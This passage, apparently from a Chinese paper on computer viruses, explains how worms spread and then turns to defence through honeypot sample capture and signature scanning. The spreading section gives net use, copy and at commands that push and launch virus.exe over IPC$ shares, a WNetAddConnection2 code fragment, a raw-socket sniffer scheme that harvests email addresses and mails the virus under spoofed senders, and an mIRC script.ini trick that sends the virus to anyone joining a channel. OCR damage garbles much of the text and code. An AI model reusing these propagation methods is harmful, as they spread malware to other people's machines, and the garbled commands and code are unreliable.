义。
3. 病毒传播途径 3.1 通过1PC传播
1.相关命令 1)建立非空连接:
Ne use WP\\ ipc \用户名\密码\, 2)拷贝文件
Copy virus .exe \\\\remote ip\\admin
admin就是c:\\winnt或c:\\Windows目录,使用c ,d就是C盘D盘。
3)查看时间
Net time \\\\remote ip
4) at \\\\remote ip time virus.exe
用at命令启动virus.exe(这里设置的时间要比主机时间) 2.程序实现
NET.IP Remote Name=(char*)\WNetAddConnection2 (&NET, & password,&usemame,0); Copy File (LocalViursFile, \\\\\\\\RemotelP\\\\admin);
7
这种方法依赖于密码. 3.2 通过电子邮件传播 3.2.1 原理
编写电子邮件客户端程序,把病毒作为附件发送过去。可是,发送给谁呢?这就要获得电子邮件地址。 3.2.2 SMTP协议框架
我们先来看看SMTP的发送协议,在rfc821(smtp)和rfc1521(mime)里面写得非常清楚,SMTP的整个发送过程如下:
Socket连接后,按SMTP协议通讯(注意每条命令结尾符”回车\\换行\\、回车、换行,结束): 1、HELO
Example:HELOsmtp.163.net\\r\\n 2、MAILFROM:\\r\\n
发送者的Email地址。
xample:MAILFROM:src@163.net\\r\\n 3.3 利用Sniffer来建立信任关系
从Win2000开始,WinSock 2的 wsaloctl可以给一个SOCK_RAW类型的socket设置SIORCVALL属性,这样该socket就可以收到所有
8
经过本机的所有数据。因此无需自己编写驱动程序就可以截获流经本机的数据了。
下面将利用这个原理,获得邮件地址及信任关系。步骤如下: 1.创建Raw Socket,设置SIO_RCVALL,截获所有流经本网卡的数据包。 2.分析收到的PE包头,如果Dest Port是25转3,否则抛弃,继续执行2
3.取出数据,寻找Helo h\\r\\n、From:flan、to:t\\r\\n、Mail From mf\\r\\n.、Rctp To rt\\r\\n、忽略<>,取出h ,f ,t, mf , rt这些有用数据。
4.如果ip包的SrcIP为本机ip,则保存mf,作为本机发送邮件的可选发件人,收件人为本机发现的邮件地址。 5.向rt发送邮件,病毒为附件,发件人为f 6.向mf发送邮件,病毒为附件,发件人为t 3.4 通过IRC聊天通道传播 一 SCRIPT.NII SCRIPT.NII自身是一个mIRC脚本语言,它内部的命令允许其他 9 人控制你的IRC对话,使得mIRC客户端产生两个安全漏洞,一个是auto-DCC-get,一个是mIRC目录下的CRIPTINI会自动执行。它本身不是一个病毒,但病毒可以修改SCRIPT.NII,使mIRC用户在聊天时传播自身。 二.通过mIRC聊天通道传播 这段代码在OMIRC、下创建script.ini文件,写入的命令使得任何人在加入你聊天的通道时,将病毒发送给他。命令在mIRC的帮助文件中有详细讲解。 [Script] n0=on1: join:*.*:[if($nick==$me)(halt) n1=/descend串nickVirusPath n3=1 4. 病毒的攻与防 4.l样本截获技术 经常看到AV软件的广告上说XX公司率先截获了XX病毒,这种截获的方法通常给人以过分复杂的感觉,其实并不神奇,这就是蜜罐系统(这种蜜罐与分析Hacker行为的那个不一样!)可以如下构造: 准备一台上网机器,安装Win2k+Spl(不装SPl可能受到无数初级菜鸟的Scan),再安装IIS6.0和SQL Server 2002,能开的服务都打开,最好再装上 NAV(防止重复获得已知病毒的样本),并装上ISA FireWall来监控网络流,也装上Sniffer XP来做底层包截获,最后装上文件变化记录敬监视文件可以只有几种类型的几个文件就行了), 10 再用Ghost备份这台机器的硬盘。 现在己经准备了一台这样的DIY型蜜罐了,到Hot Mail注册一个E-mail, 然后加入多个国外的新闻组等热闹的地方(这样子才有可能得到样本!)。接下 来就是等待了,查Outlook的Mails,等到Sniffer XP的监视出现流量异常或NAV被关闭或NAV失效,此时应该多打开几次一些Program目录下的程序以确保病毒的感染,然后一 IPCS和US进来的病毒或蠕虫会开一些新进程,用 Ctrl+Alt+Del把他们查出来,找到那些文件— 复制到存样本的小盘里(推荐USB移动硬盘),然后把文件变化记录器中变化的文件拷出来。这样子就得到了疑似样本了。 4.2提取样本技术 样本有Office文档,脚本,PE文件,网络数据包等形式,在准备分析前,需要一些基本工具:一台性能不错的机器(能运行VMWare就行了),够大的内存和硬盘。安装Win2k,最新的SoBIce, IDA pro, PEDump, Language没有特殊之处,如果没采用EPO,和简单病毒一样,采用EPO则和EPO病毒一样,只是分析病毒代码和变形算法具有相当的难度。 得到样本后,接下来的工作就是分析病毒,对于普通病毒,要提取特征码,加到特征数据库;对于变形病毒,要分析其特征,升级杀毒程序。 4.3如何发现普通病毒 特征码和特征字扫描依然是行之有效的方法。 4.3.1 特征码扫描简介 特征码就是某个病毒所具有的与其它病毒不同,而且又可以把它和正常程 序区别开的一段代码。存储特征码的数据库结构各不相同,不过大体上都得有特征码,病毒描述信息等部分组成。 扫描法是检测一个文件,如果在文件内部所有具有可执行属性的节发现了某一种特定字节串,就表明发现了该字节串所代表的病毒。 11